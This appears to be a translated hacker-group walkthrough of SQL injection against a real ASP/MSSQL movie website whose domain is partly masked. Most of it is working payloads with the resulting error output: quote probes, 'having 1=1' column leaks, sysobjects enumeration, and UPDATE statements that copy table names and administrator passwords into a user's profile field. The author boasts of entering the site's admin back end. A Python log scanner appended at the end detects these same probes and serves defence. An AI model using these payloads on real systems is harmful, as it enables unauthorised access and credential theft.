Author: Leaf [EST]
Source: evil baboons China
Obtaining table and field names. Applicability:
1) The database is MSSQL.
2) The application connects to the database as an ordinary (non-privileged) user.
3) The ASP source code is unknown.
Attacks that can be carried out:
1) Add, view, and change data content.
Example:
This document uses the ASP page http://www.dy***.com/user/wantpws.asp as the example target for the tests below.
Step 1:
Enter a single quote (') in the username field. The page displays:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/user/wantpws.asp, line 63
This shows that single quotes are not filtered and that the database is MSSQL.
Step 2:
Enter: a';use master;--
The page displays:
Microsoft OLE DB Provider for SQL Server error '80040e21'
Multiple-step OLE DB operation generated errors. Check each OLE DB status value, if available. No work was done.
/user/wantpws.asp, line 63
This means the database user has no permission for this.
Step 3:
Enter: a' or name like 'fff%';--
A user named ffff is displayed.
Step 4:
Enter the username:
ffff' and 1<>(select count(email) from [user]);--
The page displays:
Microsoft OLE DB Provider for SQL Server error '80040e37'
Invalid object name 'user'.
/user/wantpws.asp, line 96
This shows there is no table named user; try users instead. It also shows that there is a column named email.
(A shortcut is to enter a' having 1=1--
which usually returns the table name and the first field name directly:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'users.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/user/wantpws.asp, line 63
)
Now we know that the password of the ffff user is 111111.
The following statements are used to obtain all table names and field names in the database.
Step 5:
Enter:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
Note:
This statement fetches the name of the first user table in the database and writes it into the email field of user ffff.
Viewing user ffff's profile then reveals the first table name: ad.
Next, obtain the table's ID from the name ad:
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
As shown in the preceding figure, the id is 581577110.
Because object IDs are assigned in ascending order, we can enumerate the names of all user tables. The second table name is obtained like this:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ad 581577110
users 597577167
buy 613577224
car 629577281
learning 1 645577338
logs 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk
After some guessing, the analysis above shows that the password and users tables are the most important.
Step 6: Guess the fields of the important tables
Now let's look at the fields of the users table. Enter:
ffff';update [users] set email=(select top 1 col_name(object_id('users'),3) from users) where name='ffff';--
The third field is password.
ffff';update [users] set email=(select top 1 col_name(object_id('users'),4) from users) where name='ffff';--
The fourth field is name.
Finally, all 28 fields of the users table are obtained.
(Note: another way to obtain the fields, provided the server returns error messages:
a' group by id having 1=1--
gives
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'users.userid' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/user/wantpws.asp, line 63
The second field is userid.
To show the third field:
a' group by id,userid having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/user/wantpws.asp, line 63
The password field is obtained.
Continue in the same way until all fields are shown. :)
)
users table (28 fields, numbered by position):
1 id, 2 userid, 3 password, 4 name
5 province, 6 homeaddress, 7 city, 8 adress, 9 starlook, 10 sex, 11 email, 12 nlook, 13 nos, 14 date, 15 money, 16 send
17 oklook, 18 dnlook, 19 lasthits, 20 phone, 21 askmejoin, 22 getmoney, 23 payno, 24 logintime, 25 mflag, 26 state, 27 post, 28 note
Values observed for some of these fields:
starlook -- 12 10 2003 PM
nlook -- 0
nos -- 2 (login count)
date -- 12 10 2003 12:00 AM (registration time?)
money -- same as above
send -- null
oklook -- 0
dnlook -- 0
getmoney -- 0
state -- 0
note -- "this guy is very good..." (description)
password table (3 fields):
1 id, 2 name, 3 pwd
Then I tried ad, which records ad hit points.
Then try the password table to obtain the name and pwd fields.
Run:
ffff';update [users] set email=(select top 1 name from password) where name='ffff';--
The first user name is admin123; most of them are administrators.
Then we get the password "dy***" or "dick188...
With this we are fully into the admin back end of this movie website, haha.
http://www.dy***.com/login.asp
You can also obtain the passwords of the three administrators:
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
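Every probe in this walkthrough leaves a recognisable trace in the web server's request log (a lone quote, a stacked statement ending in --, a read of sysobjects, the having 1=1 and col_name(object_id()) tricks, an update that copies a subquery result into a profile field). The following scanner is an added example, not part of the original write-up: it flags those patterns in constructed log lines of the form METHOD PATH QUERYSTRING (the cs-uri-stem and cs-uri-query columns of an IIS log); the signature labels and sample lines are my own.

```python
import re
from urllib.parse import parse_qsl

# (label, regex) pairs matched against a decoded, lower-cased parameter value;
# each label corresponds to one probe used in the walkthrough above.
SIGNATURES = [
    ("comment_terminator", re.compile(r"--\s*$")),
    ("stacked_query", re.compile(r";\s*(use|update|select|insert|delete|exec)\b")),
    ("use_master", re.compile(r"\buse\s+master\b")),
    ("sysobjects_enum", re.compile(r"\bsysobjects\b")),
    ("having_probe", re.compile(r"\bhaving\s+1\s*=\s*1\b")),
    ("col_name_probe", re.compile(r"\bcol_name\s*\(\s*object_id\s*\(")),
    ("update_exfil", re.compile(r"\bupdate\s+\[?\w+\]?\s+set\s+\w+\s*=\s*\(\s*select\b")),
    ("tautology", re.compile(r"\bor\s+\w+\s+like\b|\bor\s+1\s*=\s*1\b")),
]

def classify(value):
    """Return the labels that fire on one already URL-decoded parameter value."""
    text = value.lower()
    hits = [label for label, rx in SIGNATURES if rx.search(text)]
    # An odd number of single quotes is the step-1 probe (unclosed quotation mark).
    if text.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    return hits

def scan_log(lines):
    """Scan 'METHOD PATH QUERYSTRING' lines; return [(line_no, path, {param: labels})]."""
    findings = []
    for no, line in enumerate(lines, 1):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        _method, path, query = parts
        flagged = {}
        for key, val in parse_qsl(query, keep_blank_values=True):  # decodes %xx and +
            labels = classify(val)
            if labels:
                flagged[key] = labels
        if flagged:
            findings.append((no, path, flagged))
    return findings

# Constructed sample lines mirroring steps 1 to 5 of the write-up (line 1 is benign).
SAMPLE_LOG = [
    "POST /user/wantpws.asp name=ffff&email=x",
    "POST /user/wantpws.asp name=%27",
    "POST /user/wantpws.asp name=a%27%3Buse+master%3B--",
    "POST /user/wantpws.asp name=a%27+or+name+like+%27fff%25%27%3B--",
    "POST /user/wantpws.asp name=ffff%27%3Bupdate+%5Busers%5D+set+email%3D%28select+top+1"
    "+name+from+sysobjects+where+xtype%3D%27u%27%29+where+name%3D%27ffff%27%3B--",
    "POST /user/wantpws.asp name=a%27+having+1%3D1--",
]
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 6 and names the probe seen in each; a single alert on sysobjects_enum or update_exfil from a low-privilege application account is worth an immediate look, since the application itself has no reason to issue those statements.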